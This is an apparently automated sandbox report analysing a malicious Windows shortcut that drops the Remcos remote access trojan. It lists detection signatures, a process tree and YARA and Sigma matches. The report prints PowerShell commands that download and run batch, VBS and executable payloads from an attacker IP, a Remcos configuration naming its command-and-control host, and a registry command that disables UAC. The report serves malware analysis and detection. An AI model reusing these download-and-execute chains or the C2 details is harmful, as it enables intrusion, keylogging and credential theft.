Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dlr7HYI6VL.lnk

Overview

General Information

Sample name:Dlr7HYI6VL.lnk
renamed because original name is a hash value
Original sample name:383bec1808c99dcffafa9f4e03f104a4.lnk
Analysis ID:1518489
MD5:383bec1808c99dcffafa9f4e03f104a4
SHA1:2f3647ea4331f7848de1c96cef6427b7136ab835
SHA256:be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850
Tags:lnkuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 4072 cmdline: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1780 cmdline: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1584 cmdline: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6600 cmdline: powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6068 cmdline: cmd /c C:\Users\user\AppData\Roaming/hi.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 2024 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • cmd.exe (PID: 6412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4904 cmdline: powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
          • AUGUST.exe (PID: 5376 cmdline: C:\Users\user\AppData\Roaming/AUGUST.exe MD5: 25860926414BF43383246F7C773A8D6C)
            • DZIPR.exe (PID: 5660 cmdline: "C:\Users\user\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)
              • DZIPR.exe (PID: 992 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
                • cmd.exe (PID: 6600 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • explorer.exe (PID: 1460 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • svchost.exe (PID: 6980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • DZIPR.exe (PID: 4780 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 2720 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 5388 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • DZIPR.exe (PID: 2832 cmdline: "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4924 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\qapuwvrJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Local\Temp\qapuwvrJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\Users\user\AppData\Local\Temp\qapuwvrJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\AppData\Local\Temp\qapuwvrWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aab8:$a1: Remcos restarted by watchdog!
        • 0x6b030:$a3: %02i:%02i:%02i:%03i
        C:\Users\user\AppData\Local\Temp\qapuwvrREMCOS_RAT_variantsunknownunknown
        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64b7c:$str_b2: Executing file:
        • 0x65bfc:$str_b3: GetDirectListeningPort
        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65728:$str_b7: \update.vbs
        • 0x64ba4:$str_b9: Downloaded file:
        • 0x64b90:$str_b10: Downloading file:
        • 0x64c34:$str_b12: Failed to upload file:
        • 0x65bc4:$str_b13: StartForward
        • 0x65be4:$str_b14: StopForward
        • 0x65680:$str_b15: fso.DeleteFile "
        • 0x65614:$str_b16: On Error Resume Next
        • 0x656b0:$str_b17: fso.DeleteFolder "
        • 0x64c24:$str_b18: Uploaded file:
        • 0x64be4:$str_b19: Unable to delete:
        • 0x65648:$str_b20: while fso.FileExists("
        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 15 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000011.00000000.2322852163.0000000000401000.00000020.00000001.01000000.00000006.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x134b8:$a1: Remcos restarted by watchdog!
                • 0x13a30:$a3: %02i:%02i:%02i:%03i
                Click to see the 53 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                24.2.cmd.exe.5862757.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  24.2.cmd.exe.5862757.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x1d149:$s1: CoGetObject
                  • 0x1d0a2:$s2: Elevation:Administrator!new:
                  24.2.cmd.exe.5861b57.3.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    24.2.cmd.exe.5861b57.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x1dd49:$s1: CoGetObject
                    • 0x1dca2:$s2: Elevation:Administrator!new:
                    26.2.explorer.exe.4e80757.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      Click to see the 74 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powerup Write Hijack DLL
                      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1780, TargetFilename: C:\Users\user\AppData\Roaming\hello.bat
                      Sigma detected: Suspicious Invoke-WebRequest Execution
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4072, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, ProcessId: 1780, ProcessName: powershell.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c C:\Users\user\AppData\Roaming/hi.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6068, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , ProcessId: 2024, ProcessName: wscript.exe
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1780, TargetFilename: C:\Users\user\AppData\Roaming\hello.bat
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 6980, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp
                      Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4072, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, ProcessId: 1780, ProcessName: powershell.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, ProcessId: 4072, ProcessName: cmd.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c C:\Users\user\AppData\Roaming/hi.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6068, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , ProcessId: 2024, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4072, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, ProcessId: 1780, ProcessName: powershell.exe
                      Sigma detected: Proxy Execution Via Explorer.exe
                      Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 1460, ProcessName: explorer.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6980, ProcessName: svchost.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\gpsAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\demhwkAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvrAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Found malware configuration
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpackMalware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\demhwkReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Temp\gpsReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvrReversingLabs: Detection: 86%
                      Multi AV Scanner detection for submitted file
                      Source: Dlr7HYI6VL.lnkReversingLabs: Detection: 15%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\gpsJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\demhwkJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvrJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Dlr7HYI6VL.lnkJoe Sandbox ML: detected
                      Source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_3a1bc7b9-5

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
